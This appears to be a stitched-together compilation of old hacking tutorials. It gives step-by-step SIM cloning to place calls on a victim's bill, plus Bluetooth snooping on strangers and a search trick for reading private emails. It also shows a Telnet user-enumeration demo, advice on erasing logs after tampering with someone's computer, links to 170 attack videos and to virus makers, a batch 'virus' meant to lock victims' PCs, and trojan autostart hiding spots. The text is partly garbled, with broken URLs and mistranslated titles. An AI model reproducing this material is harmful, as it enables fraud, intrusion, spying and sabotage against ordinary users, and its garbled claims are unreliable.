let's talk about the fun stuff. The first trick I will discuss is an activity that is becoming quite prevalant, SIM cloning. If you have paid attention to any cell phone related tutorials in the past, then you may remember cloning being made popular by certain public figures like Kevin Mitnick in order to place calls on the bill of another subscriber. Well, even with GSM this trick still holds relevant. How could such a flaw exist in a system that is obviously concentrated on preventing such fraudulant use? The flaw is within the COMP128 authentication algorithm used as an instantiation of A3/A8 widely used by gsm providers. Unfortunately for these providers, the COMP128 algorithm is just not strong enough to prevent fraud. We attack the algorithm by using a chosen-challenge attack, which works by forming a number of specially-chosen challenges and querying the SIM card for each one. Then by analyzing the responses from these queries, we are able to determine the value of the secret key that is used for authentication. So how do we perform this attack?
Well there are a few things you need before you start. First you will need to buy a SIM card reader, a card programmer, empty silver pic 2 card, and an unregulated adapter, and if you don't have one a 9 pin male to female extension cable. You can probably put a bid on ebay for most of this hardware, or just google up some sites that sell them. You will also need some software for this trick. First you will need a SIM card editor. An excellent piece of software to use in this instance is Cardinal Sim Editor, which you can find (including the crack for it) at the below link...
http://www.cracksweb.com/news.php?go=82
Another tool you will is CardMaster, which once again you can find at the below link...
http://cardmaster.dk/download2.php
Finally what you will need is a SIM card emulator. An excellent example of an emulator to use is SIMEMU, which you can find at the below link...
http://simemu.cjb.net/
Note for those of you who feel the need to read the instructions on the site, just go to www.freetranslation.com to translate the web page from Spanish to English. Now let's go ahead and get started shall we. You will first want to plug your SIM Reader into your com port. Then run Cardinal and then click where it says "Click Here" and then click Settings. You will then select your com/serial port and the baud rate. Then you will close this out, and then left click where it says "Click Here", go to smartcard, and click SIM editor. The program will from there start up, and you will go to SIM, then SIM Info, and click the load button. After doing this you will see the IMSI code, take note of this code as you will need it. Now close the SIM Info and go to Security/Find key KI. When this window opens just click Start and wait. It will take approximately 4 hours to find the key. Once it is found take note of this KI and exit. Now you should have the IMSI and KI noted, if so lets continue with the next step. Now take your silver card. Within the unzipped file within you will find two files. SEE50s.hex (EEPROM) and SEF50sEN.hex (PIC). Now connect your programmer to a com port and go to the setup menu on your CardMaster program and choose the appropriate com port. You should then see a yellow rectangle at the bottom of the program that says that there is no card. Now insert your smartcard into the programmer, and the rectangle should change to green and you will see "Card ready". Now go to where it says "Card type:" and select "Silvercard". NOw go to the "File to Pic:" field and upload SEF50sEN.hex, then go to the "File to Eeprom:" field and upload SEE50s.hex. Now go to Edit and click "Auto Program". Now once this is finished you will need to cut the card so that it will fit into the phone. Instructions for how the card needs to be cut is provided on the GSM solutions web site that will be listed in the Sites to Visit section at the bottom of this page. Now insert the newly cut silvercard into the phone. If it asks for
. If it asks for a pin just punch in 111. Then from the main menu open up "Sim-Emu". Now from this menu go to Set Phone #, then -GSM #1 (or any slot), then Configure, then Edit #. Now edit GSM #X to any name, and then press ok. Now go to Config.Pos. and it will ask for PIN2, which will be 1234. It will then ask you what position you want the card to be, choose Position 1. It will then ask you for the IMSI, which you will punch in the IMSI you got from Cardinal. It will then ask you for the KI, which again you punch in the KI you got from Cardinal. It will then ask you to enter your PUK which can be anything up to 8 digits. Then it will ask you to enter your PIN which can be anything up to 4 digits. There you go, now you have cloned another SIM card, and are now free to call away all you want to on someone elses bill. There have also been rumors that on certain services there are ways to clone a SIM remotely, but none have been tested so this can't be proven. So now that we're finished talking about SIM cloning, let's get into another trick involving exploiting gsm phones, bluejacking. What is bluejacking you ask? Bluejacking is exploiting the BlueTooth wireless communication system common among PDAs, cell phones, and of course laptops. In essense this is nothing more than a harmless little prank, similar to defacing web sites. For bluejacking gsm phones what we are trying to do is first create a phonebook contact that says something like "haha I haxor3d j00r ph0n3!", and then send it to any bluetooth enabled device in the facinity. This in essense amounts up to at most a harmless little prank, but it's fun to watch their faces when they get the message. However, I won't bother explaining the details of how to bluejack, since the methods are models and manufacturer dependant, and are explained on a site that will be listed at the bottom of this tutorial. Don't believe that the possibilities for exploiting bluetooth enabled gsm phones ends there though. Another activity that we can jump onto is called bluebugging.
Bluebugging is the process of sniffing out communication from a bluetooth-enabled cell phone. Like, for example, sms messages. Yup, now you can sit in a coffee shop, open up your laptop, and spy on everyone else who is using their phone. This concept was first introduced to the world in a presentation at DefCon 11, and is now available to the public in the form of a tool called BlueSniff that works as a bluetooth wardriving utility to play big brother. Go to the below address to get a copy of this tool...
http://bluesniff.shmoo.com/bluesniff-0.
Another nice tool to use for such means is btscanner, which can be used to gather as much information as possible on a bluetooth-enabled device. Yet again, this wonderful tool can be found at the below address...
http://www.pentest.co.uk/src/btscanner-
How to clone GSM Sim
Google - Peep into other's email Boxes
The idea is, one Google advanced search string is filetype: . It is used to find out any file only. Now I'm using this string as a tool,
I am searching for filetype:eml eml intext:"Content-Type: image/jpeg".
Look at the keyword. It is finding a file with extension eml and that eml should have a Line Content-Type: image/jpeg. Now remember the old days, MIME encoding of a email. When ever we are attaching a .jpg file, that line should come in .eml file. So, the full keyword is searching for filename any with extension .eml which is email file extension, and it should contain a .jpg file, may be some photo or other picture from the web. You can't belive if you are not checking it yourself.
Keyword : filetype:eml eml intext:"Content-Type: image/jpeg"
Here is ur example lollxxx
http://www.google.com.pk/search?hl=en&q=filetype%3Aeml+eml+intext%3A%22Content-Type%
Telnet - A Tutorial to Telnet and Hacking
Now you may be looking at this going, "What the hell is Telnet?". If you are, don't worry, I'll explain everything. First of all, Telnet is software that allows you to connect to another Telnet Host.
In windows systems Telnet is usually called Telnet32.exe or Telnet.exe. In newer versions of windows it is Telnet32.exe.
*** Note to Windows XP users: Don't go and get the old version of Telnet, because you have a DOS-Based one. I'll give commands along this guide so you can enjoy it too. You have to either run "Telnet" or "cmd" and then "Telnet".
Telnet is not illegal and is used by thousands of remote computers to interchange data, share connections, and do many other things that would be impossible without it.
The default port for Telnet is port 23. When I say for instance, 'Connect to the sys' I am referring to connecting on the system's default port for Telnet. Sometimes you can't determine a port so you will have to port scan a sys to find the Telnet Ports.
Port 25 is the 'Sendmail Protocol' port. We will be dealing with this port as well.
Telnet Security
Because there are so many problems with Telnet today involving cyber crime and hacking, SysAdmins often restrict anonymous use of their sys's Telnet Proxies. This is cheap and can be bypassed easily.
Most SysAdmins are amatures at what they do and make me laugh. They restrict the Telnet proxies on port 23 and think that we can't telnet to other ports such as 81 and 25 because we can't use the Telnet Proxy. Well they are wrong. We can easily do it and we will. Let me point out a system that has this and was not effective. I will star out the IP for privacy.
Welcome to Mcft Telnet. Telnet32.exe.
o
connecting to 202.232.**.** 23 (The port number)
Connected.
Connection to host lost (unauthorized use of Telnet Proxy(ies).
o
Connecting to 202.232.**.** 25 (Watch this..)
Welcome to ********.net Sendmail Program. Welcome to all staff.
vrfy bin
..550
vrfy sys
..550
vrfy root
..550
vrfy admin
..550
vrfy games
..550
vrfy uucp
..550
q
..550
c
Connection to host lost on command.
Ok people is there a problem there? How many addys did I get? Am I supposed to have those? Do I care? No. I am just demonstrating how bad Unix-System security is and how easy it is to use the Telnet Proxy to your advantage. Here, I wil list some commands for all of you running under DOS.
C - Close the Current Connection
D - Display the sys's operating paremeters
O - Connect to a host name (on default port 23) [port]
q - Quit (Exit Telnet).
Set- Set Options
Send - Send data/strings to server
Telnet, as you know so far, is a very useful tool for hackers. Hell, if you can't connect to a computer, you can't hack it. Its that simple.
Now the best thing about Telnet is that virtually every Windows computer has it, comes with it, and is able to run it.
THINGS GOING WRONG ON HACKING OR TELNET
I have a Windows 98 computer and I am running Telnet. It gives me a lot more options when connecting to a computer, and these commands don’t go anywhere! What do I do? I get the hostname part and all that, just what does Term-Type mean?
Ok people, so many people have asked me this I'm ready to start getting an auto-flame response on my e-mail box LoL. Anyway, here goes:
Term Type means Terminal Type. It is the version of the Telnet Terminal that the host or server is running. You have to specify this, Telnet is not hacker-friendly.
In Windows 98/95/ME you are not running a DOS-Based version of Telnet. You get a client program, somewhat considered shit for me. I like the DOS based one and frankly, I find it a lot easier to use.
I can't connect to the host!
Well, the host either doesn't exist, does not support Telnet Packets or Connections, or is currently restricting proxy access or usage from your addy or all addresses.
I went further than you because I thought I knew what I was doing! I got this message saying my hacking attempt was logged! Am I going to go to jail!?!?!
Don’t worry, as long as its not with the extension .log or .hlog or .hacklog you're fine, as 95 percent of these messages are BS and lies.
IF THEY'RE LIES, how come they knew I was hacking them?
They don't. They simply search for incoming connections not recognized by the server. If the SysAdmins didn't modify the message, you would have gotten this:
"Error 229292: Data not recognized 8191: Distinct Remote Service Lost or Corrupt."
They just modified it. Breath in, breath out, relax.
My dad or mom found out I was hacking, and my dad's an expert on computers! He made it so I can't view anything on AOL. What the hell's going on! Give me a trick to evade this!
Sure thing. Connect to AOL, ping the site you're trying to view, and type in the IP address. You will get to the homepage, but this isn't that good a trick because you can't ping sub-addys and you're going to get text for the sub-urls. This might or might now work.
I was screwing around with my friends computer. I think I left my information somewhere, but where?
Usually, you have a critical system log. If you delete a system file (which unless you're 133t you'd NEVER EVER do) the computer's going to boot and give you a log of what happened before the deletion of the file so you know what went wrong. If you did happen to delete it, it will list something like "deletion from x.x.x.x. (your IP)". If it does, damn, you're busted. But there are ways of getting rid of this "hacker-knock out". First off, get a WAN-Controller, or any sort of program that lets you input screen or Hardware input by the output. This means you can control their computer with yours. But you can't boot this computer, because it will break the connection.
Access the log files usually in system or system32 (both system files located in C:/Windows or C:/). There, you will see encrypted sh1t. CTRL+A will select it all and delete it all. If you do delete this file, (after you do), try recovering the system file. WHATEVER YOU DO DON'T DO A SYSTEM RESTORE, YOU HAVE BEEN WARNED.
Some hacker has my IP and hacks it every time I log on. It's static, which means it doesn't change. How do I make him stop? I don't know what his IP is, either!
Go to start, run, "netstat -a". Hacking is almost equivalent to connecting, if he's hacking you your connected to him and he's connected to you. Netstat -a is a command that allows you to see all your connections to hosts and servers, associated with TCP/IP. If you see a hostname that you don't recognize, log it. In fact, click Print Screen, go to paint, CTRL+V, Crop the image of the DOS window for Netstat, and save it. That should be quite easy.
170 Hacking videos
Code:
1. Installation of soks of proxy of server on vulnerable the system
http://video.antichat.net/file1.html
Code:
2. XSS- vulnerability in forums SMF 1.05
http://video.antichat.net/file2.html
Code:
3. XSS on Wapbbs. Forum vbulletin. Obtaining the password of the privileged user.
http://video.antichat.net/file3.html
Code:
4. XSS on mail Yandex.Ru
http://video.antichat.net/file4.html
Code:
5. Sql injection in cursor php_.fusion
http://video.antichat.net/file5.html
Code:
6. XSS in forums FastBB
http://video.antichat.net/file6.html
Code:
7. XSS in forums XMB
http://video.antichat.net/file7.html
Code:
8. Interception of session on server pochta.ru
http://video.antichat.net/file8.html
Code:
9. Seizure IRC of the channel
http://video.antichat.net/file9.html
Code:
10. We rock mp3 free of charge
http://video.antichat.net/file10.html
Code:
11. COSMO chat. admin it did not advance the right
http://video.antichat.net/file11.html
Code:
12. Breaking of cursor new sploytom (ZENER)
http://video.antichat.net/file12.html
Code:
13. ExBB 1.9.1. PHP-inklhding into adminke and other vulnerabilities
http://video.antichat.net/file13.html
Code:
14. zmail.ru: Sniffer and session. We read strange letters.
http://video.antichat.net/file14.html
Code:
15. Service of the virtual postcards Vcard Lite. Part of 2.
http://video.antichat.net/file15.html
Code:
16. Service of the virtual postcards Vcard Lite. Part 1.
http://video.antichat.net/file16.html
Code:
17. [ FLASH ] rues on IBM AIX
http://video.antichat.net/file17.html
Code:
18. [ FLASH ] sequential of rues ispravlenym eksploytom
http://video.antichat.net/file18.html
Code:
19. Is utilized short hyphen. We make no invisible.
http://video.antichat.net/file19.html
Code:
20. Vulnerability http://www.chatmoscow.ru
http://video.antichat.net/file20.html
Code:
21. IRC. Mockery above Slader-Non
http://video.antichat.net/file21.html
Code:
22. Vulnerabilities SetccMS (XSS)
http://video.antichat.net/file22.html
Code:
23. Installation Apache, Php, Perl, Mysql to localhost
http://video.antichat.net/file23.html
Code:
24. Php- injection in the script of news CuteNews v1.3.1
http://video.antichat.net/file24.html
Code:
25. Method of the interpretation of khesha IPB 2..x and breaking the forum
http://video.antichat.net/file25.html
Code:
26. Breaking Invision Power Board sploytom
http://video.antichat.net/file26.html
Code:
27. New vulnerability PunBB
http://video.antichat.net/file27.html
Code:
28. cuz uze google'n'yandex before askin ' stupid questions %)
http://video.antichat.net/file28.html
Code:
29. WWWThreads Bug
http://video.antichat.net/file29.html
Code:
30. Breaking phpBB 2.0.15 new sploytom
http://video.antichat.net/file30.html
Code:
31. Active XSS in LiveJournal.com
http://video.antichat.net/file31.html
Code:
32. Installation of proxy to unix the machine
http://video.antichat.net/file32.html
Code:
33. XSS in phpBB with use phpNuke
http://video.antichat.net/file33.html
Code:
34. Idea of defeysa of the site through the search demands!
http://video.antichat.net/file34.html
Code:
35. Defeys of the site through the vulnerability in PunBB (php include)
http://video.antichat.net/file35.html
Code:
36. Breaking OF LARGE BROTHER - tntbrat.ru. SQL - injection.
http://video.antichat.net/file36.html
Code:
37. Breaking hack-info.net through PHP injection and GIF the file
http://video.antichat.net/file37.html
Code:
38. Breaking of the mailbox through the holes on the server
http://video.antichat.net/file38.html
Code:
39. SQL- Eng. in IPB 1. *, 2. *. Obtaining khesha of admina
http://video.antichat.net/file39.html
Code:
40. History of the breaking of one site
http://video.antichat.net/file40.html
Code:
41. XSS in MercuryBoard. New.
http://video.antichat.net/file41.html
Code:
42. Vulnerability IkonBoard. Reading it is file
http://video.antichat.net/file42.html
Code:
43. Error of khostera in tuning of system.
http://video.antichat.net/file43.html
Code:
44. Obtaining administrative privelegiy in paBugs
http://video.antichat.net/file44.html
Code:
45. Vulnerability phpBB in module downloads.php
http://video.antichat.net/file45.html
Code:
46. XSS in many search with- swing. It is in detail.
http://video.antichat.net/file46.html
Code:
47. Breaking phpBB new sploytom
http://video.antichat.net/file47.html
Code:
48. XSS in PunBB 1..x
http://video.antichat.net/file48.html
Code:
49. XSS in MercuryBoard 1..x
http://video.antichat.net/file49.html
Code:
50. Vulnerability in SR Guestbook
http://video.antichat.net/file50.html
Code:
51. Breaking of box on e-mail.ru (part of 2)
http://video.antichat.net/file51.html
Code:
52. Breaking of box on nm.ru (part 1)
http://video.antichat.net/file52.html
Code:
53. Seizure of the site through the injection in Zorum
http://video.antichat.net/file53.html
Code:
54. SQL injection in forums Minibb 1.6
http://video.antichat.net/file54.html
Code:
55. XSS in forums phorum
http://video.antichat.net/file55.html
Code:
56. XSS in forums He11.net and LedForums
http://video.antichat.net/file56.html
Code:
57. XSS in vBulletin 2..kh.kh
http://video.antichat.net/file57.html
Code:
58. XSS in forums zorum
http://video.antichat.net/file58.html
Code:
59. Bases of work with John The Ripper
http://video.antichat.net/file59.html
Code:
60. Analysis vzlomanoy BD
http://video.antichat.net/file60.html
Code:
61. Registration KeySpy Generator
http://video.antichat.net/file61.html
Code:
62. Vulnerability in phpBB 2.0.12 (KEZ)
http://video.antichat.net/file62.html
Code:
63. Vulnerability in phpBB 2.0.12 (max_.pain89)
http://video.antichat.net/file63.html
Code:
64. We obtain seriynik for progi through ArtMoney
http://video.antichat.net/file64.html
Code:
65. We read strange letters on mail.ru through the sessions
http://video.antichat.net/file65.html
Code:
66. SQL injection in LedForums
http://video.antichat.net/file66.html
Code:
67. Example Post- Flood through DenyoLaunch III
http://video.antichat.net/file67.html
Code:
68. SQL injection in search.php in phpBB 2.0.6
http://video.antichat.net/file68.html
Code:
69. SQL injection in MercuryBoard 1.1.0
http://video.antichat.net/file69.html
Code:
70. Study of protection WinRAR 3..0b =)
http://video.antichat.net/file70.html
Code:
71. Second method of the theft of nikov in the chat room
http://video.antichat.net/file71.html
Code:
72. CHAT ROOM. Seizure of nikov.
http://video.antichat.net/file72.html
Code:
73. Presence s/n for WinZIP 8..0b
http://video.antichat.net/file73.html
Code:
74. We make patch for BlueFace (CodeFusion)
http://video.antichat.net/file74.html
Code:
75. We make patch for WinZIP 8..0b (CodeFusion)
http://video.antichat.net/file75.html
Code:
76. We penetrate in strange comp. through Remote Administrator
http://video.antichat.net/file76.html
Code:
77. Pincha no longer catches the antivirus
http://video.antichat.net/file77.html
Code:
78. Survey of bagov in cgi scripts.
http://video.antichat.net/file78.html
Code:
79. Idea of brutoforsa amperesecond through HTTP demands.
http://video.antichat.net/file79.html
Code:
80. As to drive away as'ku. One of the methods.
http://video.antichat.net/file80.html
Code:
81. By vlom with the aid of rAdmin Of brutforsera!
http://video.antichat.net/file81.html
Code:
82. one additional method to skachat' paid mp3 c of site mp3search.ru.
http://video.antichat.net/file82.html
Code:
83. Defeys on the rapid. Bagi on the server. Admin did not advance right on the folders.
http://video.antichat.net/file83.html
Code:
84. Vulnerability of site on cursor runcms
http://video.antichat.net/file84.html
Code:
85. Story about troyane pinch 1.0
http://video.antichat.net/file85.html
Code:
86. The new vulnerability Mybb. XSS works in all browsers.
http://video.antichat.net/file86.html
Code:
87. Breaking IcrediBB (SQL-injection)
http://video.antichat.net/file87.html
Code:
88. Baga in the the guest MPM Guesbook Pro
http://video.antichat.net/file88.html
Code:
89. As to rock mp3 for free from site mp3search.ru
http://video.antichat.net/file89.html
Code:
90. Sql-injection on cursor Php-Nuke
http://video.antichat.net/file90.html
Code:
91. SQL-injection in forum Zorum
http://video.antichat.net/file91.html
Code:
92. XSS and SQL-injection MyBB the forum
http://video.antichat.net/file92.html
Code:
93. Seizure Flesch chat room (part of 2)
http://video.antichat.net/file93.html
Code:
94. Seizure Flesch chat room (part 1)
http://video.antichat.net/file94.html
Code:
95. XSS in the forums in sparenykh BB tags VBulletin 3.0. *
http://video.antichat.net/file95.html
Code:
96. As to become adminom of forum ITA V1.49.
http://video.antichat.net/file96.html
Code:
97. Vulnerabilities in Zeroboard.
http://video.antichat.net/file97.html
Code:
98. Video about the the new XSS in the forums in sparenykh BB the tags
http://video.antichat.net/file98.html
Code:
99. UNION in SQL demands. Example of work.
http://video.antichat.net/file99.html
Code:
100. Vozmozhye vulnerabilities in scripts Manlix.
http://video.antichat.net/file100.html
Code:
101. As to become adminom on the site made in Flat-nuke.
http://video.antichat.net/file101.html
Code:
102. Error of adminov with installation Guestbook v1.1. Defeys on the rapid.
http://video.antichat.net/file102.html
Code:
103. Defeys for the small. Defeys on the rapid.
http://video.antichat.net/file103.html
Code:
104. Again PHPBB. if the provider of dull.
http://video.antichat.net/file104.html
Code:
105. XSS vulnerability in forum forum.antichat.ru (vbulletin 3.0.3)
http://video.antichat.net/file105.html
Code:
106. To the article about mail.ru. We steal Cooks in the chat room. More detailed video.
http://video.antichat.net/file106.html
Code:
107. To the article about mail.ru. We steal Cooks in the chat room. We become moderators chat.mail.ru.
http://video.antichat.net/file107.html
Code:
108. php inklyuding KorWeblog
http://video.antichat.net/file108.html
Code:
109. Breaking e-mail'ov 2. Sorting of passwords. Is utilized Brutus (under Windows).
http://video.antichat.net/file109.html
Code:
110. Breaking e-mail'ov. Is utilized THC - Hydra.
http://video.antichat.net/file110.html
Code:
111. Vulnerability Ultimate PHP Board (UPB) v1.9
http://video.antichat.net/file111.html
Code:
112. Forum Russian Board Or as it is not necessary to write authorization system. (found Max_.pain)
http://video.antichat.net/file112.html
Code:
113. As to obtain strange letters on ramblere
http://video.antichat.net/file113.html
Code:
114. LiteForum 2 (SQL-injection)
http://video.antichat.net/file114.html
Code:
115. We look passwords on forum Powered by Web Wiz Forums.
http://video.antichat.net/file115.html
Code:
116. Overcrowding of buffer. Theory.
http://video.antichat.net/file116.html
Code:
117. We steal UIN, having a base of the users
http://video.antichat.net/file117.html
Code:
118. As to steal the Internet on 445 port
http://video.antichat.net/file118.html
Code:
119. Baga ConfYmi 2.1
http://video.antichat.net/file119.html
Code:
120. We obtain root, I use sploita.
http://video.antichat.net/file120.html
Code:
121. Practitioner Flood
http://video.antichat.net/file121.html
Code:
122. VIDEO SQL Injection IPB 2.0. *
http://video.antichat.net/file122.html
Code:
123. Bagi of white resist- site mag.su
http://video.antichat.net/file123.html
Code:
124. Real breaking PHPBB
http://video.antichat.net/file124.html
Code:
125. SQL injection in forum IbProArcade
http://video.antichat.net/file125.html
Code:
126. Breaking PHPBB
http://video.antichat.net/file126.html
Code:
127. Fraud Online of games.
http://video.antichat.net/file127.html
Code:
128. Breaking of forum MiniBB
http://video.antichat.net/file128.html
Code:
129. SQL injection in the forum * He11.net Forums v1.0 *
http://video.antichat.net/file129.html
Code:
130. Seizure of the site through through cosmo-chat. Continuation...
http://video.antichat.net/file130.html
Code:
131. XSS in forum ExBB 1.9.1 THE II rocking shell- A
http://video.antichat.net/file131.html
Code:
132. XSS in forum ExBB 1.9.1
http://video.antichat.net/file132.html
Code:
133. SQL-injection in forum phpBB 2.0.6
http://video.antichat.net/file133.html
Code:
134. XSS in forum Web Wiz Forums v7.7 on securitylab.ru
http://video.antichat.net/file134.html
Code:
135. SQL-injection in the popular forum UBB threads 6.2.3
http://video.antichat.net/file135.html
Code:
136. Fulfillment shell- commands through curved perl- script (sendmail)
http://video.antichat.net/file136.html
Code:
137. We obtain seriynik for progi (php-injection)
http://video.antichat.net/file137.html
Code:
138. XSS in the chat room on kc-camapa.ru
http://video.antichat.net/file138.html
Code:
139. Breaking of the site through cgi- error: paypy
http://video.antichat.net/file139.html
Code:
140. Seizure of the site through cosmo-chat
http://video.antichat.net/file140.html
Code:
141. We drive away paid script free of charge (ezUpload pro 2.2)
http://video.antichat.net/file141.html
Code:
142. Yuzayem random cgi-telnet =)
http://video.antichat.net/file142.html
Code:
143. XSS in the chat room on muz-tv.ru
http://video.antichat.net/file143.html
Code:
144. Breaking of the site through cgi- error: of the byte
http://video.antichat.net/file144.html
Code:
145. Breaking of the site through php-injection and knowledge SQL
http://video.antichat.net/file145.html
Code:
146. We penetrate adminku of the news script Absolute Engine
http://video.antichat.net/file146.html
Code:
147. Breaking of site on cursor shad0wed portal 5
http://video.antichat.net/file147.html
Code:
148. Difeys through the injection in Advanced Guestbook 2.2
http://video.antichat.net/file148.html
Code:
149. Breaking of the school site through the vulnerability on home page of teacher.
http://video.antichat.net/file149.html
Code:
150. Breaking of the site through standard PHP- injection.
http://video.antichat.net/file150.html
Code:
151. Obtaining root rights on server yargsm.ru
http://video.antichat.net/file151.html
Code:
152. 6 video recordings about the recent attack on the living periodical.
http://video.antichat.net/file152.html
Code:
153. The fulfillment of the arbitrary code in Mcft Windows with working WMF it is file.
http://video.antichat.net/file153.html
Code:
154. Demonstartsiya of the filling of shela to forums IPB of version 2.0.4 when the password of administrator is present.
http://video.antichat.net/file154.html
Code:
155. Breaking of program XoftSpy.
http://video.antichat.net/file155.html
Code:
156. Vparivaniye of troyana. Operation of vulnerability "not complete way to the processor" Windows (total) commander.
http://video.antichat.net/file156.html
Code:
157. Obtaining adminki and the filling of shela in cursor e107
http://video.antichat.net/file157.html
Code:
158. Installation IRC of boat under Windows.
http://video.antichat.net/file158.html
Code:
159. Registration of program Advanced Security Level.
http://video.antichat.net/file159.html
Code:
160. interesnya idea about how it is possible to flood Shell to forums phpBB of any versions, if there is access to the administratorskoy panel.
http://video.antichat.net/file160.html
Code:
161. Breaking of paid hosting- provider with the use of old vulnerability in phpBB on one of the sites of hosting and the curvedly disposed server under control FreeBSD.
http://video.antichat.net/file161.html
Code:
162. "Admin Password Exploit" (author)
http://video.antichat.net/file162.html
Code:
163. Breaking e107 with use ImageManager/manager.php - the built-in file is manager.
XSS is not used!
http://video.antichat.net/file163.html
Code:
164. Khalyavnyy Internet in the local network.
http://video.antichat.net/file164.html
Code:
165. Seizure of the IRK- boat, which repeats phrases =)
http://video.antichat.net/file165.html
Code:
166. Video about the breaking of server under control Windows 3.1
http://video.antichat.net/file166.html
Code:
167. Theft of the 6- marking icq through that attached to it e-mail.
http://video.antichat.net/file167.html
Code:
168. Use wwwhack based on example vBulletin.
http://video.antichat.net/file168.html
Code:
169. One additional hole in cursor e107.
http://video.antichat.net/file169.html
Code:
170. Theft it is no in the chat room through breaking e-mail'a (by brutoforsom).
http://video.antichat.net/file170.html
Virus Makers
http://www.megaupload.com/?d=6YPTOAXR
http://rapidshare.com/files/29541835/TeraBIT_VM_2.8.zip.html
- Code: Select all
http://www.megaupload.com/?d=Y356K5W7
- Code: Select all
http://jeyjey.persiangig.com/Download/JPSVM3.zip
How To Get Virus Off
You may have thought it was funny at first but that virus that you opened that was supposed to be a joke doesnt go away very easily. If you restart your computer it will start again. Heres what you do.
1. Go into processes and end the process csmm.exe
2. Go to the toolbar and click start.
3. My computer
4. C:
5. Windows
6. System 32
Now once your in system 32 there will be A LOT of files. Go to the one that says csmm and delete it. Then you can restart your computer and the virus wont start again
Tutorial:Create a batchvirus
When the victim opens this file nothing will happen, BUT if she/he shuts down his/her computer, he/she will never gets his/her pc running again…
So a good advice: DON’T RUN THIS AFTER YOU CREATED IT !!!!!
Note: Anti-Viruses CAN’T detect this kind of virus…
Code:
Date: 9:47 pm Thu Nov 4, 1993 Number : 18 of 33
From: XXXXXXXXXXXXXXX Base : Virus Discussion
To : XXXXXXXXXXXXXXX Refer #: 11
Subj: Re: Pas Viruii Replies: None
Stat: Normal Origin : Local
XX> creating batch file virii. If you’re not all to hot in programming, batch
XX> files can be loads of fun.
good call. the most simple batch i can think of is umm two batch files:
@echo off
:t1
t2
:t2
t1
put t1 in the autoexec and it locks up each time. unless you load from a:drive
which is another reason im trying to f*ck up the cmos on a puter
trojans hide up at strat-up
1. START-UP FOLDER. Windows opens every item in the Start Menu’s Start Up folder. This folder is prominent in the Programs folder of the Start Menu.
Notice that I did not say that Windows “runs” every program that is represented in the Start Up folder. I said it “opens every item.” There’s an important difference.
Programs represented in the Start Up folder will run, of course. But you can have shortcuts in the Start Up folder that represent documents, not programs.
For example, if you put a Microsoft Word document in the Start Up folder, Word will run and automatically open that document at bootup; if you put a WAV file there, your audio software will play the music at bootup, and if you put a Web-page Favourites there, Internet Explorer (or your own choice of a browser) will run and open that Web page for you when the computer starts up. (The examples cited here could just as easily be shortcuts to a WAV file or a Word document, and so on.)
2. REGISTRY. Windows executes all instructions in the “Run” section of the Windows Registry. Items in the “Run” section (and in other parts of the Registry listed below) can be programs or files that programs open (documents), as explained in No. 1 above.
3. REGISTRY. Windows executes all instructions in the “RunServices” section of the Registry.
4. REGISTRY. Windows executes all instructions in the “RunOnce” part of the Registry.
5. REGISTRY. Windows executes instructions in the “RunServicesOnce” section of the Registry. (Windows uses the two “RunOnce” sections to run programs a single time only, usually on the next bootup after a program installation.)
6. REGISTRY. Windows executes instructions in the HKEY_CLASSES_ROOT\exefile\shell\open\command “%1″ %* section of the Registry. Any command imbedded here will open when any exe file is executed.
Other possibles:
[HKEY_CLASSES_ROOT\exefile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\comfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\batfile\shell\open\command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] =”\”%1\” %*”
[HKEY_CLASSES_ROOT\piffile\shell\open\command] =”\”%1\” %*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\ open\command] =”\”%1\”
%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\ open\command] =”\”%1\”
%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\ open\command] =”\”%1\”
%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\ Open\Command] =”\”%1\”
%*”
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\ open\command] =”\”%1\”
%*”
If keys don’t have the “\”%1\” %*” value as shown, and are changed to something like “\”somefilename.exe %1\” %*” than they are automatically invoking the specified file.
7. BATCH FILE. Windows executes all instructions in the Winstart batch file, located in the Windows folder. (This file is unknown to nearly all Windows users and most Windows experts, and might not exist on your system. You can easily create it, however. Note that some versions of Windows call the Windows folder the “WinNT” folder.) The full filename is WINSTART.BAT.
8. INITIALIZATION FILE. Windows executes instructions in the “RUN=” line in the WIN.INI file, located in the Windows (or WinNT) folder.
9. INITIALIZATION FILE. Windows executes instructions in the “LOAD=” line in the WIN.INI file, located in the Windows (or WinNT) folder.
It also runs things in shell= in System.ini or c:\windows\system.ini:
[boot]
shell=explorer.exe C:\windows\filename
The file name following explorer.exe will start whenever Windows starts.
As with Win.ini, file names might be preceeded by considerable space on such a line, to reduce the chance that they will be seen. Normally, the full path of the file will be included in this entry. If not, check the \Windows directory
10. RELAUNCHING. Windows reruns programs that were running when Windows shut down. Windows cannot do this with most non-Microsoft programs, but it will do it easily with Internet Explorer and with Windows Explorer, the file-and-folder manager built into Windows. If you have Internet Explorer open when you shut Windows down, Windows will reopen IE with the same page open when you boot up again. (If this does not happen on your Windows PC, someone has turned that feature off. Use Tweak UI, the free Microsoft Windows user interface manager, to reactivate “Remember Explorer settings,” or whatever it is called in your version of Windows.)
11. TASK SCHEDULER. Windows executes autorun instructions in the Windows Task Scheduler (or any other scheduler that supplements or replaces the Task Scheduler). The Task Scheduler is an official part of all Windows versions except the first version of Windows 95, but is included in Windows 95 if the Microsoft Plus Pack was installed.
12. SECONDARY INSTRUCTIONS. Programs that Windows launches at startup are free to launch separate programs on their own. Technically, these are not programs that Windows launches, but they are often indistinguishable from ordinary auto-running programs if they are launched right after their “parent” programs run.
13. C:\EXPLORER.EXE METHOD.
C:\Explorer.exe
Windows loads explorer.exe (typically located in the Windows directory)during the boot process. However, if c:\explorer.exe exists, it will be executed instead of the Windows explorer.exe. If c:\explorer.exe is corrupt, the user will effectively be locked out of their system after they reboot.
If c:\explorer.exe is a t*r*o*jan, it will be executed. Unlike all other autostart methods, there is no need for any file or registry changes - the file just simply has to be named c:\explorer.exe
14. ADDITIONAL METHODS.
Additional autostart methods. The first two are used by t*r*o*jan SubSeven 2.2.
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entversion\explorer\Usershell folders
Icq Inet
